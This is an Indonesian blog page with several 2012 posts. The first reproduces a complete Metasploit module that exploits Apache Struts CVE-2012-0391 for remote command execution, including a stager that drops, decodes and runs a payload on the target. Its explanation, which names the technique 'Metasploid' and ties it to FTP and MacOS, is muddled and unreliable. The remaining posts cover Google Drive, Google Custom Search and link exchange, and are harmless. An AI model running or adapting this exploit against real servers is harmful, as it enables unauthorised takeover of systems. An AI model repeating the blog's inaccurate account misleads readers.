Ayhu_blog

Kamis, 14 Juni 2012

Hacking Teknik Metasploid Oleh Hacker-Hacker Veteran Injeksi Remote Access Computer Command

Salam blogger Indonesia?
Kami tidak berbagi cara untuk melakukan hacking ini,
Namun kami akan berbagi alur dari proses hacking tersebut.

Yeaa? kebanyakan hacker selalu melakukan aksinya jika terlihat celah-celah yang memungkinkan mereka dapat menerobos keamanan dari setiap system yang mereka targetkan.
Begitu pulsa dengan cara Metasploid.

Teknik ini memanfaatkan sebuah koneksi FTP (File Tranfer Protocol) yang memungkinkan hacker untuk dapat mencuri file taget melalui protocol yang mereka jebol, dalam proses ini CMD (Command) sangat diberlakukan dan melakukannya melewati lajur HTTP Client.

Mungkin para hacker yang menggunakan cara ini banyak yang memakai OS (Operation System) Linux, adapun beberapa hacker kawakan yang menggunakan Windows, tapi dalam proses ini pendukung yang sangat kuat dari OS sebenarnya adalah MacOS, karena dalam MacOS FTP yang tampil lebih banyak dari setiap fitur-fitur hacking tersebut memungkinkan para hacker dapat melihat lajur atau kondisi Koneksinya.

Cobalah perhatikan proses lajut Metasploid dibawah :

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

# http://metasploit.com/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::CmdStagerTFTP

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'Apache Struts <= 2.2.1.1 Remote Command Execution',

'Description' => %q{

This module exploits a remote command execution vulnerability in

Apache Struts versions < 2.2.1.1. This issue is caused because the

ExceptionDelegator interprets parameter values as OGNL expressions

during certain exception handling for mismatched data types of properties,

which allows remote attackers to execute arbitrary Java code via a

crafted parameter.

'Author' =>

[

'Johannes Dahse', # Vulnerability discovery and PoC

'Andreas Nusser', # Vulnerability discovery and PoC

'juan vazquez', # Metasploit module

'sinn3r' # Metasploit module

'License' => MSF_LICENSE,

'Version' => '$Revision: $',

'References' =>

[

[ 'CVE', '2012-0391'],

[ 'OSVDB', '78277'],

[ 'EDB', '18329'],

[ 'URL', 'https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt']

'Platform' => [ 'win', 'linux'],

'Privileged' => true,

'Targets' =>

[

['Windows Universal',

{

'Arch' => ARCH_X86,

'Platform' => 'win'

}

['Linux Universal',

{

'Arch' => ARCH_X86,

'Platform' => 'linux'

}

'DisclosureDate' => 'Jan 06 2012',

'DefaultTarget' => 0))

register_options(

[

Opt::RPORT(8080),

OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),

OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])

], self.class)

end

def execute_command(cmd, opts = {})

uri = String.new(datastore['TARGETURI'])

uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'

uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'

uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))

vprint_status("Attempting to execute: #{cmd}")

resp = send_request_raw({

'uri' => uri,

'version' => '1.1',

'method' => 'GET',

}, 5)

end

def windows_stager

exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

execute_cmdstager({ :temp => '.'})

@payload_exe = payload_exe

print_status("Attempting to execute the payload...")

execute_command(@payload_exe)

end

def linux_stager

cmds = "/bin/sh@-c@echo LINE | tee FILE"

exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)

base64 = Rex::Text.encode_base64(exe)

base64.gsub!(/\=/, "\\u003d")

file = rand_text_alphanumeric(4+rand(4))

execute_command("/bin/sh@-c@touch /tmp/#{file}.b64")

cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")

base64.each_line do |line|

line.chomp!

cmd = cmds

cmd.gsub!(/LINE/, line)

execute_command(cmds)

end

execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")

execute_command("/bin/sh@-c@chmod +x /tmp/#{file}")

execute_command("/bin/sh@-c@rm /tmp/#{file}.b64")

execute_command("/bin/sh@-c@/tmp/#{file}")

@payload_exe = "/tmp/" + file

end

def on_new_session(client)

if target['Platform'] == 'linux'

print_status("Deleting #{@payload_exe} payload file")

execute_command("/bin/sh@-c@rm #{@payload_exe}")

else

print_status("Windows does not allow running executables to be deleted")

print_status("Delete the #{@payload_exe} file manually after migrating")

end

def exploit

if not datastore['CMD'].empty?

print_status("Executing user supplied command")

execute_command(datastore['CMD'])

return

end

case target['Platform']

when 'linux'

linux_stager

when 'win'

windows_stager

else

raise RuntimeError, 'Unsupported target platform!'

end

handler

end

end

Dari Scipt diatas menunjukkan bahwa semua lajut hacking melalui CMD, dan itu semua tergantung pada seorang hacker yang melakukan Teknik Metasploid tersebut.
Sehingga target dan tujuan dari pengambilan data atau file dapat dengan mudah di Remote atau decontrol oleh hacker tersebut.

Hanya itu penjelasan tentang teknik Metasploid dari kami.
Semoga bermanfaat, dan dapat menambah pengetahuan sobat?

Salam Rafi Orilya Groups?

Baca juga artikel dibawah :

Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)

Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

Memafaatkan Layanan Google Drive untuk Menyimpan / Mengupload File untuk didownload diblog sendiri

Selamat pagi, sahabat Rafi Orilya Groups....
Hari ini hari yang cerah untuk berbagi hal yang kita miliki bersama orang lain.
Semoga bisa bermanfaat...
Hehehe....

Sobat berfikir untuk menyimpan atau mengupload file pada suatu situs sehingga dapat mendownloadnya pada blog sobat-?
Tenang.... kini kami berbagi sesuatu yang memungkinkan menjawab pertanyaan sobat.
Yaa,... benar solusinya adalah Google Drive.

Layanan Google Drive merupakan layanan penyimpan file sama seperti Ziddu, Mediafire, atau 4Shared yang telah kita ketahui. Walaupun penyimpanan Google Drive ini sudah lama ada, namun saat ini dari mulai adanya Google++ membuat kita jauh lebih mudah menyimpan file pada Google Drive. Google Drive juga menyediakan kapasitas penyimpanan sebesar 5GB, yeaa... cukup untuk banyak kita menshare file yang akan kita bagikan. Dan satu lagi yang membuat lebih disegani, yaitu GRATIS...
hahaha....

Yeasudah, daripada mikirin gratis terus, silahkan coba sendiri ajah.
hehehe..
Untuk menggunakan layanan Google Drive sebelummnya harus memiliki Akun Google, jika sobat sudah memiliki Akun Goole. Silahkan masuk pada link dibawah :

https://drive.google.com/start?authuser=0#home

Kemudian silahkan anda upload file yang akan didownload, jangan lupa ketika selesai mengupload copy Link Download yang akan tampli saat selesai mengupload. Dan kemudian letakkan link URL download tersebut pada blog sobat. Sehingga dapat didownload oleh orang lain.

Seperti itulah yang dapat kami bagikan saat ini,
Semoga bermanfaat dan dapat membuat sobat berkenan untuk hanya berkomentar pada potingan ini.
Komentar anda sangat kami butuhkan.
Jangan lupa juga lakukan Tukar Link pada blog kami...

Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)

Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

Cara Membuat Search Engine dari Google untuk Blog Sendiri layanan Googel CSE dengan mudah dan Cepat

Hello, sahabat ROG....
Mungkin sudah banyak postingan yang menyangkut layanan-layanan dari google pada blog ini, yeaa... seperti itulah kelebihan dari Google. Memungkinkan kita mempermudah hal yang akan kita cari, miliki, atau dapatkan dari Layanan Google.
Hmmm....
Kali ini saya berbagi salah satu Layanan Google yang sangat bermanfaat buat blog sobat. Sehingga mempercantik tampilan serta isi dari blog sobat memungkinkan membuat pengunjung betah diblog sobat.

Yeaa... Kali ini saya akan berbagi Search Engine Custom dari Google untuk blog sobat, sehingga pengunjung dapat dengan mudah keyword atupun postingan dari blog sobat.
Jika pengunjung memasukkan Keyword ?hacking?, maka Serach Engine tersebut akan segera melacak dan mendeteksi semua potingan anda yang mengandung kata ?hacking?.

Yasudah. Jangan lama-lama,
Untuk mendapatkan Search Engine dari Google, anda harus memiliki akun Google terlebih dahulu.
Jika sudah memilikinya. Silahkan masuk pada Link dibawah :

http://www.google.com/cse/?hl=en

1. Silahkan masuk pada Layanan Google Search Engine tersebut.
2. Kemudian silahkan buat Nama dari Search Enginnya
3. Lalu pilih Model tema atau warna dari Google Search Engine
4. Terkhir Klik Next dan Copy semua Script.nya
5. Letakkan pada Widget atau pada HTML blog anda
6. Selesai....

Perhatian-!
- Jika anda saat langkah ke 3, melakukan costumize pada warna Model Tema. Maka script akan lebih panjang karena akan tampil CSS yang mengatur costumize tersebut, dan memungkinkan mengurai kecepatan blog anda atau memperlambat loading blog anda.

Yaa, hanya itu yang dapat saya bagi hari ini.
Semoga bermanfaat...
Jangan lupa jika sebagai blogger yang masih belajar sebaiknya kita memberikan komentar atau sekedar saran atas postingan ini, sehingga saling memperbaikki kesalahan masing-masing.
Silahkan berkomentar dibawah, jika anda suka postingan diatas.

Artikel Dilindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)

Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin

Senin, 11 Juni 2012

Tukar Link - Sebagai Persahabat Antar Blogger Indonesia

Rafi Orilya Groups | www.rafi-orilya.blogspot.com

Bagi para blogger Indonesia mari kita jalin persatuan dan kesatuan dengan saling Link Exchange atau tukar link antar sesama blog.
Memungkinkan bisa saling terhubung persahabtan antar blogger.
Kami ingin Indonesia selali bersatu dalam dunia manapun.
Karena kami Generasi Untuk Bangsa...

Baik langsung saja, bagi sobat-sobat, atau agan-agan yang ingin bertukar link, silahkan pilih mode Tukar Link yang ada dibawah ini :

Mode 1 :

Silahkan copy dan paste pada blog sobat

<a href="http://rafi-orilya.blogspot.com/" target="_blank" title=" rafi orilya|hacking, software, windows, artikel, blogging"><img_proxy src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6RHfUigqeRvL5DmcRqL08Qn8DM4C_6YENNVRxJVg5axA7cVbPPRqo87Y33Rsar8pjJVQrrNviTvNuHpors6Z5vn5PgIg3CDY5IAj3bmapFnIWh1QVdJQR5dFtqQlOxsigBsyBPigpuPA/s1600/07.jpg" border="0" alt="Rafi Orilya Groups"></a>

Atau dengan yang mode 2 :

Silahkan copy dan paste pada blog sobat

<a href="http://rafi-orilya.blogspot.com/" target="_blank" title=" rafi orilya|hacking, software, windows, artikel, blogging"><img_proxy src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_cznoB-Ks-BfPBihkJ-hrO-YAkopemXy2euznL2TU-CrMs3rRwo2fnpXbUjAj1j8IKxMQXkeviLAmSX1_rJkio4ORCg-kMF3DphAbl6IOD6HwDZMMHBvFNMdCo49_HelaizgWQRxGYhs/s1600/09.jpg" border="0" alt="Rafi Orilya Groups"></a> <br>

Atau dengan menambahkan Link Teman, pada blog anda dengan format :
Link tujuan => http://rafi-orilya.blogspot.com
Nama Link => Rafi Orilya Groups

Atau Copy dibawah untuk tukar link :

<a href='http://www.rafi-orilya.blogspot.com/' title='Rafi Orilya Groups|Hacking, Blogging, Cracking, Defacing, Software, Artikel'>Rafi Orilya Groups</a>

Cara memasang Backlink ini :
1. Pilih dan COPAS code diatas sesuai mode pilihan (gunakan CTRL+c)
(tidak akan tampil block drag teks, maka gunakan CTRL+a untuk mengopy semua)
2. Masukkan pada blog sobat
3. Kemudian klik Gambar Link Tersebut atau Link Rafi Orilya Groups
(Jika anda mengklik Link Kami di blog sobat maka kami tahu bahwa sobat telah memasang Link Kami pada blog sobat sehingga kami akan langsung memasang Link Sobat ke blog kami)
atau dengan berkomentar dibawah jika sobat telah memasang Link Kami di blog sobat.
=> Maka kami akan segera memasang Link Sobat di blog kami

Syarat Tukar Link (Link Exchange) :
- Blog anda menggunakan Blogger, Wordpress, atau Domain Lain

- Telah mempostingkan Lebih dari 5 Posting
- Alamat blog masih aktif sampai saat ini
- Untuk Pagerank kami tidak permasalahkan (karena ingin persahabatan)
- Tidak berisi konten yang mengandung unsur SARA, Kekerasan, Pornografi
- Saling berbagi informasi

Hanya itu syarat-syarat yang kami berikan, segera.lah gabung dengan kami.
Dan segeralah Tukar Link disini, maka kami akan segera Memasang Link sobat disini.
Salam persahabatan blogger Indonesia...
Bangkitlah Indonesia...
Untukmu... Indonesiaku...

KOMENTAR DIBAWAH SUDAH MELEBIHI BATAS
UNTUK MELIHAT KOMENTAR SOBAT, KLIK [TERBARU] atau [MEMUAT] DIATAS FORM KOMENTAR

Daftar Banner Sahabat Blogger